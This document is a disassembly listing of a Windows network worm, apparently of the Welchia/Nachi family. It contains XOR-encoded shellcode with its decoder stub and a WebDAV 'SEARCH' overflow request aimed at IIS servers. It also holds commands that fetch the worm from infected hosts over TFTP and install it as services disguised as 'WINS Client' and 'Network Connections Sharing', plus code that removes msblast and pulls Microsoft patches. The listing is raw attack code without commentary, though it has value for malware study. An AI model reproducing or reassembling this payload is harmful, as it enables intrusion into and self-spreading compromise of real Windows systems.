dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 2 dup(0)
dword_4057DC dd 20h ; sub_402170+29�w
dword_4057E0 dd 0 dword_4057E4 dd 20h ; sub_402170+2E�w
dword_4057E8 dd 5C005Ch aC1234561111111: ; DATA XREF: sub_402170+7B�o
unicode 0, <\C$\123456111111111111111.doc>,0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402170+55�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dword_40584C dd 7F08321Ah db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
db 126h dup(90h)
; ---------------------------------------------------------------------------
loc_40597E: ; DATA XREF: sub_401F30+13C�o
jmp short loc_405990
; =============== S U B R O U T I N E =======================================
sub_405980 proc far ; CODE XREF: sub_405980:loc_405990�p
pop edx
dec edx
xor ecx, ecx
mov cx, 176h
loc_405988: ; CODE XREF: sub_405980+C�j
xor byte ptr [edx+ecx], 99h
loop loc_405988
jmp short loc_405995
; ---------------------------------------------------------------------------
loc_405990: ; CODE XREF: seg000:loc_40597E�j
call near ptr sub_405980
loc_405995: ; CODE XREF: sub_405980+E�j
jo short loc_4059F8
cdq
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 21h
dd 0E6646995h, 0E9129912h, 0D9123485h, 12411291h, 6A9AA5EAh
dd 9AE1EF12h, 0B9E7126Ah, 0D712629Ah, 0CF74AA8Dh, 0A612C8CEh
dd 6B12629Ah, 6AC097F3h, 0C091ED3Fh, 9D5E1AC6h, 0C0707BDCh
dd 5412C7C6h, 9ABDDF12h, 9A78485Ah, 0FF50AA58h, 0DF129112h
dd 585A9A85h, 589A9B78h, 5A9A9912h
; ---------------------------------------------------------------------------
loc_4059F8: ; CODE XREF: sub_405980:loc_405995�j
adc ah, [ebx+12h]
outsb
sbb bl, [edi-69h]
adc cl, [ecx-0Dh]
call far ptr 9999h:99ED71C0h
sbb bl, [edi-6Ch]
retf
sub_405980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0CFh, 66h, 0CEh
dd 4112C365h, 71C09AF3h, 999999F8h, 12DD751Ah, 0C089F36Dh
dd 7B179D10h, 0C9C9C962h, 0F398F3C9h, 6DCE669Bh, 0C7104112h
dd 0A5C710A1h, 0FFD9C710h, 98B5DF5Eh, 89DE1498h, 59AACFC9h
dd 0F3C9C9C9h, 14C9C998h, 9B5EA5CEh, 99FDF4FAh, 0CE66C9CBh
dd 9B9E5E71h, 5E9B9999h, 0FAFA9DDEh, 89F3FAFAh, 0CE66CACEh
dd 0CE66CA61h, 0CE66C965h, 3559AA75h, 60EC591Ch, 0CACFCBC8h
dd 0C0C34B66h, 0AA777B32h, 9A715A59h, 0DE666666h, 0EBC9EDFCh
dd 0FDD8FAF6h, 0EAFCEBFDh, 0EBDA99EAh, 0FCEDF8FCh, 0FAF6EBC9h
dd 0D8EAEAFCh, 0F0E1DC99h, 0EBF1CDEDh, 99FDF8FCh, 0FDF8F6D5h
dd 0EBFBF0D5h, 0D8E0EBF8h, 0ABEAEE99h, 99ABAAC6h, 0CAD8CACEh
dd 0FCF2FAF6h, 0FA99D8EDh, 0FCF7F7F6h, 0FA99EDFAh, 0FCEAF6F5h
dd 0F2FAF6EAh, 99EDFCh
dword_405AF4 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 0
dd offset aILoveMyWifeBab ; "=========== I love my wife & baby :)~~~"...
aCopyDllcacheTf db 'copy dllcache\tftpd.exe wins\svchost.exe',0Ah
; DATA XREF: sub_401C80+175�o
db 0Dh,0
align 4
aWinsDllhost_ex db 'wins\DLLHOST.EXE',0Ah ; DATA XREF: sub_401C80+1AB�o
; sub_401C80+1BD�o
db 0Dh,0
align 4
word_405B68 dw 29Ah ; DATA XREF: sub_401990+5A�w
; sub_401990+81�r ...
align 4
aRpctftpd db 'RpcTftpd',0 ; DATA XREF: sub_401280+41�o
; sub_401280+E7�o ...
align 4
aRpcpatch db 'RpcPatch',0 ; DATA XREF: sub_401280+37�o
; sub_401660+57�o ...
align 4
aDirDllcacheTft db 'dir dllcache\tftpd.exe',0Ah ; DATA XREF: sub_401C80+11B�o
db 0Dh,0
align 10h
dword_405BA0 dd 4 ; sub_402880:loc_4028F6�r
byte_405BA4 db 3Dh ; DATA XREF: sub_401100:loc_40115A�r
db 3Dh, 2 dup(0CAh)
dd 0D2D2CBCAh, 0DADAD3D3h, 0DCDBh
aDirWinsDllhost db 'dir wins\dllhost.exe',0Ah ; DATA XREF: sub_401C80+D2�o
db 0Dh,0
align 4
aGetHttp1_1Acce db 'GET / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+B5�o
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0Dh
db 0Ah
db 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0Dh,0Ah
db 'Host: ',0
align 4
aConnectionKeep db 0Dh,0Ah ; DATA XREF: sub_402C40+95�o
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aILoveMyWifeBab db '=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice'
; DATA XREF: seg000:00405B24�o
db ': 2004 will remove myself:)~~ sorry zhongli~~~=========== wins',0
align 4
aHttpDownload_6 db 'http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b'
; DATA XREF: seg000:00405430�o
db '1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_5 db 'http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b'
; DATA XREF: seg000:0040542C�o
db '576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_4 db 'http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9'
; DATA XREF: seg000:00405428�o
db '125-6858b759e977/Windows2000-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_0 db 'http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8'
; DATA XREF: seg000:off_405424�o
db 'ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe',0
align 4
aHttpDownload_3 db 'http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8'
; DATA XREF: seg000:00405420�o
db 'a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_2 db 'http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9'
; DATA XREF: seg000:0040541C�o
db 'ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_1 db 'http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8'
; DATA XREF: seg000:00405418�o
db 'd48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_m db 'http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-a'
; DATA XREF: seg000:off_405414�o
db 'aee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe',0
align 4
aTftpISGetSvcho db 'tftp -i %s get svchost.exe wins\SVCHOST.EXE',0Ah
; DATA XREF: sub_401210+48�o
db 0Dh,0
align 4
aTftpISGetDllho db 'tftp -i %s get dllhost.exe wins\DLLHOST.EXE',0Ah
; DATA XREF: sub_401210+34�o
db 0Dh,0
align 4
aNetworkConnect db 'Network Connections Sharing',0 ; DATA XREF: sub_4015E0+57�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_4015E0+52�o
; sub_4023E0+59�o
aMsdtc db 'MSDTC',0 ; DATA XREF: sub_4015E0+4D�o
align 4
aSWinsSvchost_e db '%s\wins\svchost.exe',0 ; DATA XREF: sub_4015E0+2D�o
aSDllcacheTftpd db '%s\dllcache\tftpd.exe',0 ; DATA XREF: sub_4015E0+19�o
align 4
aWinsClient db 'WINS Client',0 ; DATA XREF: sub_401660+52�o
aDllhost_exe db 'DLLHOST.EXE',0 ; DATA XREF: sub_401660+4D�o
; sub_401C80+EC�o
aBrowser db 'Browser',0 ; DATA XREF: sub_401660+48�o
aSWinsDllhost_e db '%s\wins\DLLHOST.EXE',0 ; DATA XREF: sub_401660+24�o
aSNOZQ db '%s -n -o -z -q',0 ; DATA XREF: sub_401780+15C�o
align 4
dword_4061A8 dd 53637052h dword_4061AC dd 69767265h dword_4061B0 dd 61506563h dword_4061B4 dd 652E6B63h word_4061B8 dw 6578h ; DATA XREF: sub_401780+102�r
byte_4061BA db 0 ; DATA XREF: sub_401780+10D�r
align 4
dword_4061BC dd 74737973h, 32336D65h, 3Eh ; sub_401C80+8E�o ...
aTimeoutOccurre db 'Timeout occurred',0 ; DATA XREF: sub_401B90+95�o
align 4
aTransferSucces db 'Transfer successful',0 ; DATA XREF: sub_401B90+86�o
aTftpd_exe db 'TFTPD.EXE',0 ; DATA XREF: sub_401C80+148�o
align 4
aTftpd_exe_0 db 'tftpd.exe',0 ; DATA XREF: sub_401C80+135�o
align 4
aDllhost_exe_0 db 'dllhost.exe',0 ; DATA XREF: sub_401C80+103�o
aMicrosoftWindo db 'Microsoft Windows',0 ; DATA XREF: sub_401C80+77�o
align 4
aMicrosoft_com db 'microsoft.com',0 ; DATA XREF: sub_401E80�o
align 4
word_406238 dw 0A0Dh ; DATA XREF: sub_401F30+17E�r
byte_40623A db 0 ; DATA XREF: sub_401F30+185�r
align 4
aHttp1_1Host127 db ' HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_401F30+100�o
db 'Host: 127.0.0.1',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-length: 377',0Dh,0Ah
db 0Dh,0Ah
db 'YXYX',0
aSearch db 'SEARCH /',0 ; DATA XREF: sub_401F30+A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4022A0+1C�o
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980',0
; DATA XREF: sub_402390+2D�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980',0
; DATA XREF: sub_402390:loc_4023AC�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980',0
; DATA XREF: sub_402390+8�o
align 4
aManagesNetwork db 'Manages network configuration by updating DNS names IP address.',0
; DATA XREF: sub_4023E0+D1�o
aSWinsS db '%s\wins\%s',0 ; DATA XREF: sub_4023E0+4D�o
align 4
aDSWins db '-d%s\wins',0 ; DATA XREF: sub_402540+33�o
align 4
aRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: sub_4027B0�o
align 4
aSMsblast_exe db '%s\msblast.exe',0 ; DATA XREF: sub_402A00+63�o
align 4
aMsblast db 'msblast',0 ; DATA XREF: sub_402A00+8�o
a411 db '411',0 ; DATA XREF: sub_402C40+20A�o
aSearchHttp1_1H db 'SEARCH / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+19E�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
aServerMicrosof db 'Server: Microsoft-IIS/5.0',0 ; DATA XREF: sub_402C40+13F�o
align 4
aSSS db '%s%s%s',0 ; DATA XREF: sub_402C40+BA�o
align 4
dword_406414 dd 1 align 10h
dword_406420 dd 0 ; sub_402B20+CA�r
dword_406424 dd 0 ; sub_401F30+50�r ...
dword_406428 dd 0 ; sub_402170+100�w
dword_40642C dd 0 ; sub_4020E0+13�r
dword_406430 dd 10h dup(0) ; sub_402AB0+3F�o ...
dword_406470 dd 0 ; sub_402130+35�w ...
align 8
dword_406478 dd 0 align 10h
dword_406480 dd 0 ; sub_402170+C7�w
dd 1Bh dup(0)
dword_4064F0 dd 0 ; sub_402170+D3�w
dword_4064F4 dd 0 ; sub_402170+DF�w
dd 0Bh dup(0)
dword_406524 dd 0 ; sub_402170+EF�w
dword_406528 dd 0 ; sub_402170+F9�w
dd 5 dup(0)
dword_406540 dd 0 ; sub_402170+11E�w
dd 2Eh dup(0)
dword_4065FC dd 0 ; sub_402170+124�w
dd 74h dup(0)
dword_4067D0 dd 0 dword_4067D4 dd 0 dword_4067D8 dd 0 dword_4067DC dd 0 dword_4067E0 dd 0B3h dup(0) dword_406AAC dd 0Fh dup(0) dword_406AE8 dd 146h dup(0) seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 407000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_407000 dd 11Ch dup(0) dword_407470 dd 0 ; sub_4020E0+33�r
dword_407474 dd 0 ; sub_402170+10A�w
dword_407478 dd 8 dup(0) ; sub_401210+43�o ...
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_4011C0+14�o
; sub_4015E0+14�o ...
dd 3Dh dup(0)
dword_4075A0 dd 0 ; sub_401280+9C�r ...
dword_4075A4 dd 0 ; sub_401470+136�r ...
dword_4075A8 dd 20h dup(0) ; sub_401C80+18C�o
dword_407628 dd 20h dup(0) ; sub_401C80+15C�o
dword_4076A8 dd 0 ; seg000:00402932�w
dword_4076AC dd 0 dword_4076B0 dd 0 dword_4076B4 dd 0 dword_4076B8 dd 0 dword_4076BC dd 0FFFFFFFFh dword_4076C0 dd 0FFFFFFFFh dword_4076C4 dd 0 dd 24Eh dup(0)
dd 0E0h, 3060h, 74654701h, 7473614Ch, 6F727245h, 49010072h
dd 7265746Eh, 6B636F6Ch, 65446465h, 6D657263h, 746E65h
dd 6F6C4701h, 416C6162h, 636F6C6Ch, 6C470100h, 6C61626Fh
dd 65657246h, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 53010041h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 47010041h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 6D6E5501h
dd 69567061h, 664F7765h, 656C6946h, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 6F4C0100h, 416C6163h, 636F6C6Ch
dd 6F4C0100h, 466C6163h, 656572h, 74654701h, 73726556h
dd 6E6F69h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 47010073h
dd 454F7465h, 50434Dh, 74654701h, 74737953h, 65446D65h
dd 6C756166h, 49434C74h, 47010044h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 54010041h, 696D7265h, 6574616Eh
dd 636F7250h, 737365h, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 6F430100h, 69467970h, 41656Ch
dd 74654701h, 61636F4Ch, 6D69546Ch, 45010065h, 50746978h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 72430100h, 65746165h, 65726854h, 1006461h, 65656C53h
dd 46010070h, 43656572h, 6F736E6Fh, 100656Ch, 53746547h
dd 65747379h, 7269446Dh, 6F746365h, 417972h, 65724301h
dd 54657461h, 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h
dd 50010074h, 65636F72h, 32337373h, 73726946h, 50010074h
dd 65636F72h, 32337373h, 7478654Eh, 6C430100h, 4865736Fh
dd 6C646E61h, 43010065h, 74616572h, 6F725065h, 73736563h
dd 44010041h, 74656C65h, 6C694665h, 4165h, 0EDh, 3000h
dd 61684301h, 5365676Eh, 69767265h, 6F436563h, 6769666Eh
dd 1004132h, 72657551h, 72655379h, 65636976h, 666E6F43h
dd 41326769h, 74530100h, 53747261h, 69767265h, 416563h
dd 6C654401h, 53657465h, 69767265h, 1006563h, 69676552h
dd 72657473h, 76726553h, 43656369h, 486C7274h, 6C646E61h
dd 417265h, 74655301h, 76726553h, 53656369h, 75746174h
dd 53010073h, 74726174h, 76726553h, 43656369h, 446C7274h
dd 61707369h, 65686374h, 1004172h, 72657551h, 72655379h
dd 65636976h, 74617453h, 1007375h, 72657551h, 72655379h
dd 65636976h, 666E6F43h, 416769h, 61684301h, 5365676Eh
dd 69767265h, 6F436563h, 6769666Eh, 41010041h, 73756A64h
dd 6B6F5474h, 72506E65h, 6C697669h, 73656765h, 704F0100h
dd 43536E65h, 616E614Dh, 41726567h, 72430100h, 65746165h
dd 76726553h, 41656369h, 6C430100h, 5365736Fh, 69767265h
dd 61486563h, 656C646Eh, 704F0100h, 65536E65h, 63697672h
dd 1004165h, 4F676552h, 4B6E6570h, 78457965h, 52010041h
dd 6C436765h, 4B65736Fh, 1007965h, 6E65704Fh, 636F7250h
dd 54737365h, 6E656B6Fh, 6F4C0100h, 70756B6Fh, 76697250h
dd 67656C69h, 6C615665h, 416575h, 0FA00h, 305000h, 63490100h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 49010065h, 43706D63h
dd 74616572h, 6C694665h, 49010065h, 53706D63h, 45646E65h
dd 6F6863h, 10300h, 30F000h, 78650100h, 1007469h, 7063585Fh
dd 6C694674h, 726574h, 675F5F01h, 616D7465h, 72616E69h
dd 1007367h, 696E695Fh, 72657474h, 7301006Dh, 74737274h
dd 73010072h, 646E6172h, 3F3F0100h, 41594032h, 49584150h
dd 1005A40h, 5F705F5Fh, 6E695F5Fh, 6E657469h, 5F010076h
dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
dd 65646Fh, 72707301h, 66746E69h, 74730100h, 68637272h
dd 5F010072h, 5F5F705Fh, 646F6D66h, 5F010065h, 7465735Fh
dd 7070615Fh, 7079745Fh, 5F010065h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 6F635F01h, 6F72746Eh, 70666Ch, 78655F01h
dd 1007469h, 40333F3Fh, 50584159h, 5A405841h, 61720100h
dd 100646Eh, 7274735Fh, 706D6369h, 10E0000h, 319C0000h
dd 55010000h, 6F444C52h, 6F6C6E77h, 6F546461h, 656C6946h
dd 19000041h, 48000001h, 1000031h, 74697845h, 646E6957h
dd 4573776Fh, 24000078h, 50000001h, 0FF000031h, 4FF0017h
dd 39FF00h, 0FF000CFFh, 15FF0034h, 13FF00h, 0FF0010FFh
dd 9FF0003h, 2FF00h, 0FF0074FFh, 1FF000Dh, 8FF00h, 0FF0073FFh
dd 0BFF000Eh, 0
dd 45500000h, 14C0000h, 20080003h, 9A08h, 0
dd 0E00000h, 10B010Fh, 30000006h, 40000000h, 0
dd 2FCC0000h, 10000000h, 40000000h, 0
dd 10000040h, 10000000h, 40000h, 0
dd 40000h, 0
dd 80000000h, 10000000h, 0
dd 30000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 41B40000h, 0A00000h, 14h dup(0)
dd 40000000h, 1A40000h, 6 dup(0)
dd 742E0000h, 747865h, 213A0000h, 10000000h, 30000000h
dd 10000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 9B00000h, 40000000h
dd 10000000h, 40000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 26C80000h, 50000000h, 20000000h
dd 50000000h, 3 dup(0)
dd 400000h, 7000C000h, 43F80000h, 2 dup(755E0000h), 8DD71262h
dd 0CECF74AAh, 0BA612C8h, 0C097F36Bh, 91ED3F6Ah, 5E1AC6C0h
dd 0D97BDC9Dh, 70B7FFFEh, 5412C707h, 9ABDDF12h, 9A78485Ah
dd 0FF50AA58h, 850D9112h, 7B5ADFFFh, 0E9B7858h, 63120853h
dd 5F1A6E12h, 0F3491297h, 37DAC09Ah, 0ED71DCD8h, 60940C6Eh
dd 0C365CE66h, 0FFFEEF68h, 75F812F9h, 0F36D12DDh, 9D10C089h
dd 0C9627B17h, 0F398F300h, 0BDB2FF9Bh, 216D226Dh, 2A1C710h
dd 5EFFD9A5h, 9898B5DFh, 0FEC5BFFBh, 0C989DE14h, 2159AACFh
dd 0A5CE1403h, 0F4FA9B5Eh, 0D9CB99FDh, 7EDFB9BBh, 9E5E71CEh
dd 5E9B499Bh, 0FA9DDEh, 13CACE4Ch, 6EBADFDAh, 1B650361h
dd 1C353275h, 0C860EC59h, 0CBEDFF78h, 0C34B11DFh, 777B32C0h
dd 669A715Ah, 0EDFCDE00h, 0FAF6EBC9h, 6F7BBFD8h, 0EBFDFDFFh
dd 99EAEAFCh, 0EDF805DAh, 0D80D11FCh, 0F0E1DC99h, 0DDBFDBEDh
dd 13F1CDDCh, 4F6D563h, 0EBFBF0D5h, 17E0EBF8h, 0BB797FEEh
dd 0C6ABEAFDh, 6399ABAAh, 0F229CAD8h, 0F6FAEDFCh, 0FAFCF7F7h
dd 6FB58D24h, 0F6F5FADFh, 99143AEAh, 0D23F2057h, 0B72D20C8h
dd 0C2A88h, 81268002h, 0C8C28F7h, 2F84BF07h, 4DD137F1h
dd 642079D2h, 61636C6Ch, 745C65C2h, 0D1BFA37Dh, 2E347466h
dd 20657865h, 5C732877h, 0E9987673h, 6F14B12Bh, 0DE0A10D3h
dd 0F3D01C13h, 4C4C44FFh, 54534F48h, 4558452Eh, 0EEF9149Ah
dd 544985BDh, 500B5338h, 68637461h, 0C5B656F7h, 495A7241h
dd 0EDFFB300h, 3D3D9F2Fh, 0D2CB00CAh, 0DAD3D3D2h, 2FDCDBDAh
dd 62E607D6h, 47773463h, 68525445h, 20FE2D8Bh, 50545448h
dd 6031D32Fh, 6F46A341h, 7495D054h, 29E8203Ah, 85A8DB07h
dd 0A2C0980h, 716D2D78h, 6278F2D8h, 10707469h, 1667AF6Ah
dd 0B8767DBh, 2F2A0C70h, 0B355412Ah, 0F6DD5B6Fh, 14412D72h
dd 0ED4D456Eh, 2F616F69h, 0E154AD34h, 28202E42h, 0FEBE350Eh
dd 0B446A16Dh, 53183B06h, 35204549h, 0BF17352Eh, 5709DB51h
dd 73773A94h, 0FC383920h, 5CD7B685h, 0C3359948h, 0DA67430Bh
dd 6EA190CDh, 4B116E30h, 15A89465h, 7B53D46Ah, 0FA35177Fh
dd 0DF0467B2h, 20492000h, 0D6EA5B7Ah, 6D2019BDh, 766E179h
dd 62222026h, 6D42B90Bh, 7E293A7Bh, 765F2000h, 2EC76E78h
dd 584315B5h, 4E116E61h, 6563546Fh, 5D0B7368h, 34DC3220h
dd 4220A032h, 605B36EFh, 6CBB416Dh, 0CC8F3866h, 6FF6EDB5h
dd 7A437272h, 76677D68h, 88686F36h, 0B1480C22h, 0EA982D74h
dd 2F3A765Eh, 0AE6EBE2Fh, 85B96D80h, 0CA56A856h, 712E8C38h
dd 93FB51BDh, 2F362F16h, 5352F39h, 3764375Ah, 1BFC2FF5h
dd 62662D59h, 342D6137h, 622D39B7h, 2D366531h, 2AB7D1B0h
dd 36627A3Fh, 326C6632h, 0A105DFC2h, 30980C27h, 38424B2Dh
dd 0C0153332h, 8B76F0Eh, 4B253878h, 73B1524Fh, 0A5BDB52Fh
dd 662F386Fh, 37C83805h, 72FD3631h, 2D31FDD9h, 33626438h
dd 35346673h, 35613037h, 2BE46236h, 3904BDACh, 73803864h
dd 0F6544843h, 322266B7h, 31380531h, 66643063h, 5ADED53Eh
dd 323737FBh, 4C037362h, 0F6323139h, 3D4DB590h, 65536254h
dd 0DF731839h, 5376113Ch, 312F30E7h, 64663130h, 2F6B6D64h
dd 663034FFh, 6366652Dh, 64333335h, 0EC321CF1h, 856B6DB0h
dd 65175C34h, 73350534h, 0AF90891Bh, 0EE554E45h, 742B6D33h
dd 33657577h, 0C5325C31h, 0FF4735EAh, 7C685706h, 335B73DAh
dd 65313865h, 8353462h, 35E49C21h, 50586634h, 639B0CDh
dd 47335B42h, 43723641h, 33ED0D6Bh, 355B4864h, 5DB63730h
dd 6361F280h, 32336932h, 840733ECh, 38D8461Dh, 0C773CD73h
dd 615DD68Eh, 2B033501h, 0BB433064h, 3379470Eh, 44383361h
dd 35EC344Dh, 860AC265h, 6564590Bh, 0EB73EE02h, 53B90A18h
dd 5624339h, 46ED6B5Ah, 0D666329h, 35086C64h, 0E7EB4075h
dd 2D6D7338h, 0AC233539h, 1D252B70h, 73F16633h, 92D03FFh
dd 207100CDh, 2520692Dh, 23C2073h, 6567F203h, 6E202074h
dd 80435653h, 2F96CAC0h, 8062D629h, 0CF9E20C0h, 0EB2DBE24h
dd 6B2677D6h, 5338A920h, 0F0726168h, 2BDD80D6h, 6C0067h
dd 435444ECh, 4CD0246Fh, 13FA4207h, 256EF6Ah, 49572BC6h
dd 0A158534Eh, 7AD03580h, 41770046h, 6E02B258h, 4B60F372h
dd 0B6CB2C1Bh, 6E2DB71Bh, 717A6F02h, 18DB5D6Dh, 762A532Fh
dd 6B5F50ECh, 9ED5A36Eh, 78797358h, 633E2CECh, 817B605Ah
dd 6F65BC54h, 0F36FE875h, 31EDB475h, 6365EDD8h, 55617254h
dd 6ED83566h, 752D2C1Dh, 750A7309h, 3046136Ch, 1D36F730h
dd 0A31F6144h, 96E08604h, 0D0CFE320h, 370425C0h, 4D0FE31Fh
dd 0B9706020h, 0E706EC6Ah, 371B6C1Ah, 4710011Ch, 0BBC0CDE0h
dd 542DEF74h, 0A9E7079h, 6D2F7478h, 4E95976Fh, 67046C17h
dd 33196874h, 683F6FC2h, 58590641h, 45530001h, 0ADC55241h
dd 0C2835ED0h, 0CE7DECBBh, 1F0AD685h, 0F683504Bh, 0EC9DC52Eh
dd 4F136DB6h, 452257BCh, 555CA05Ch, 0B6850618h, 3A4F61C0h
dd 0BC61D879h, 500941D1h, 455C32h, 0C845AF33h, 0A793114h
dd 357496AFh, 0CB6E4F35h, 40266C60h, 634B6E1Ch, 0C7C1D766h
dd 8E6769C2h, 0C6204E61h, 366E4575h, 20518EC7h, 6D2B1044h
dd 30205049h, 1C970D19h, 2E9D7264h, 580F2507h, 2D70DB04h
dd 5F2B0D64h, 0C4B0754Dh, 7B480C31h, 617A736Dh, 8360A970h
dd 0D10C00AEh, 96893131h, 9B439212h, 6B276E34h, 24411EDh
dd 492DDA0Eh, 0D68518BDh, 0B41A5349h, 422001D3h, 4030C80h
dd 88580101h, 42A8CB00h, 0A5FAE052h, 0FC0B1432h, 74654701h
dd 0FB60054Ch, 724544ADh, 0D726F72h, 4A00A549h, 6C72FFC1h
dd 656B636Fh, 63654464h, 0B7EE6152h, 1123BBE6h, 416C6162h
dd 400C186Ch, 46DB6EDBh, 4F0B651Bh, 38501F70h, 1CC6005Fh
dd 0B0464964h, 72747441h, 0F6CB256Fh, 74756269h, 27534113h
dd 0F6FB9B82h, 75646F4Dh, 6E614815h, 55111B64h, 0F7B6D06Eh
dd 695693B7h, 664F7765h, 5D43102Dh, 2AAFB09h, 9441F676h
dd 0C936B25Eh, 104C6E49h, 22C0B93h, 5D92CDF4h, 330BE156h
dd 450F6701h, 24437878h, 1FD8C03Dh, 454FB358h, 950434Dh
dd 0DDA17B53h, 66F7574Eh, 43149C61h, 0BDAB4449h, 97017F7Dh
dd 0AD6D614Eh, 696D5254h, 9ED0B06Eh, 57459FCCh, 3EE66961h
dd 0B780B553h, 4F25E202h, 36486A62h, 0C3C20D7Bh, 0A1783539h
dd 3CCDB096h, 8B6D6954h, 0DD158069h, 0D9B5B7B3h, 0F7D3752Ch
dd 64066854h, 0C825B5Eh, 670B13Ch, 5C3B2FD7h, 6F733E02h
dd 7269A619h, 73764DBFh, 41797466h, 68216F36h, 33706C65h
dd 0DBEE60B5h, 709D5332h, 506F6873h, 1C2B1267h, 789A158h
dd 6F594E0Fh, 0C2C20B36h, 4586733Dh, 82B5ACD4h, 1508554Bh
dd 6DB7C20Fh, 0ED00F152h, 2E68250Ch, 7D6567h, 43930167h
dd 0A7E432E9h, 512CDB6Ch, 15791175h, 72617453h, 4B377B74h
dd 700F5116h, 69676552h, 31B671CAh, 233672ACh, 85728B6Ch
dd 399B05DDh, 75744417h, 50134C73h, 442BBE82h, 21651E80h
dd 7F2E3D9Bh, 86FC9330h, 0BF417604h, 6A644141h, 31747375h
dd 62A34059h, 46127377h, 53DF9E02h, 6872DF43h, 5961D86Ch
dd 0BA0E3FD0h, 0D9B2DCFEh, 10E32133h, 9079654Bh, 823DEC5Ch
dd 3D0F330Eh, 9623DB92h, 7581C779h, 61E69F70h, 75325663h
dd 4950FA7Ch, 12F66963h
dd 0B3706DC2h, 46389410h, 0F37B5B0h, 9D451B7Ch, 0B72CF1CDh
dd 0F0010337h, 68057265h, 5FF4E19Dh, 8E706358h, 5F5F0C72h
dd 8B476EB5h, 6772C80Ah, 0CE085FE9h, 22AEB42Dh, 70A6D18h
dd 0FB070272h, 72B9BFFEh, 3F3F0664h, 41594032h, 49584150h
dd 70365A40h, 0B6F68602h, 76652C58h, 116B8B0Eh, 3773433Eh
dd 61578882h, 6082364Ah, 64665FEDh, 6D392EC4h, 95C15A36h
dd 0D9AF9D44h, 0CC1B66E6h, 1262C510h, 0BD1D661Fh, 4B362DB7h
dd 7411703Eh, 770F7079h, 0B5A22EC6h, 13685FC7h, 0A3771133h
dd 39590215h, 1D7066E5h, 0BDD35CF6h, 58339DD3h, 2CB19D9Eh
